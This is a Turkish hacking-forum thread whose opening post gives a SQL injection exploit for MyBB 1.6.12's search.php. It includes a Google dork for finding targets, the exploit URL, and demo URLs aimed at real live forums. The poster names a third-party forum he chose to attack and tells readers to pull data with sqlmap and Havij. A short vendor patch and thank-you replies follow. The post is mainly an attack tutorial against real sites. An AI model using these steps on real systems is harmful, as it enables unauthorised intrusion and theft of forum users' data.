Konuyu Oyla:
  • Derecelendirme: 3.25/5 - 4 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Mybb Sql Acigi - Benem Farkiyla
#1
Evet arkadaslar hemen anlatima geceyim mybb 1.6.12 surumunde bulunan bir sql acigidir once exploiti vereyim
Kod:
***************************************************

# Exploit Title: MYBB 1.6.12 search.php Sql injection

# Google Dork: intext:"powered by Mybb"

# Date: Feb 14, 2014

# Exploit Author: MR.XpR

# Tested on: 7 , Kali

# Screen Shot : http://uploaderx.persiangig.com/C/mybb_sqli_error.png

# Software Link : http://resources.mybb.com/downloads/mybb_1612.zip

# Version: 1.6.12

# Vendor Site : http://mybb.com

***************************************************

Exploit :

search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

Demo :

http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

Error :

Warning [2] mysqli_real_escape_string() expects parameter 2 to be string,
array given - Line: 874 - File: inc/db_mysqli.php PHP 5.4.19

-1~dotdeb.1 (Linux)

Exm :

http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=


***************************************************

How To patch :

edit search.php and find this line :


$sid = $db->escape_string($mybb->input['sid']);


change this line to :


if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);


TnX To :

MojiRider,V30sharp,Black.viper,Zer0killer,SecretWalker,FarBodEzrail,Amirio,AL1R3​Z4,3is@
,Mr.a!

i,Mr.3ler0n,Irblackhat,inj3ct0r,3inst3in,Remot3r,IRH Member

./IRaNHaCK.org

simdi ornek bir forumda deneyelim ben hedef olarak yeni acilmis bir lamer forumunu sectim
hedef ;http://siyahsancak.netau.net/index.php

simdi exploitimizi denemek icin sitenin search.php kismini bulalim ayrica onuda belirteyim ki bazi forumda misafir uyelere bu kisimda arama yapmak izini verilmiyor.o zaman uye olup denemelisiniz

www.deccal.org


evet arkadaslar simdi exploitimizi uyguladiktan sonraki slq hatasina bakalim ayrica ireli duzel sql bilgisi olanlar kali linux sqlmapda direk upload deniye bilirler bunu ebu duhan daha onceki konularinda anlatmisdi

www.deccal.org

evet arkadaslar gerisi size kalmis havijle kolon cekersiniz selametle ben benem kiss
Beğenenler: BYHAKLİRT
#2
eline saglık ...
Beğenenler:
#3
(13-04-2014, Saat: 21:26)archavin Adlı Kullanıcıdan Alıntı: eline saglık ...

tesekkurler dostum
Beğenenler:
#4
eline sağlık
www.deccal.org
Beğenenler:
#5
(13-04-2014, Saat: 21:45)M3L1S4 Adlı Kullanıcıdan Alıntı: eline sağlık

tesekkur ederim
Beğenenler:
#6
Eline sağlık exciting
Beğenenler:
#7
(13-04-2014, Saat: 21:51)N3OXO3 Adlı Kullanıcıdan Alıntı: Eline sağlık exciting

eyvallah dostum
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Mybb Temaya Shell Inject Etme Ayar 40 1,765 24-10-2016, Saat: 22:18
Son Yorum: _CORTON_
  Mybb Passer Pro H4Sec 21 825 25-12-2015, Saat: 23:45
Son Yorum: MaXToN
  Mybb Nasıl İndex Atılır [ CYBeRiZM ] B3lirsiz 46 3,816 04-10-2015, Saat: 00:53
Son Yorum: ataberkus99
  MyBB'de Konfigürasyon Dosyasını Okuyarak Navicatla Hack Yapma KingSkrupellos 0 397 18-09-2014, Saat: 18:52
Son Yorum: KingSkrupellos
  Mybb Forum Hack ! BordoHackeR 2 1,921 27-01-2014, Saat: 14:34
Son Yorum: DeLeTeD
Anahtar Kelimeler

Mybb Sql Acigi - Benem Farkiyla indir, Mybb Sql Acigi - Benem Farkiyla Videosu, Mybb Sql Acigi - Benem Farkiyla Online izle, Mybb Sql Acigi - Benem Farkiyla Bedava indir, Mybb Sql Acigi - Benem Farkiyla Yükle, Mybb Sql Acigi - Benem Farkiyla Hakkında, Mybb Sql Acigi - Benem Farkiyla Nedir, Mybb Sql Acigi - Benem Farkiyla Free indir, Mybb Sql Acigi - Benem Farkiyla Oyunu, Mybb Sql Acigi - Benem Farkiyla Download


1 Ziyaretçi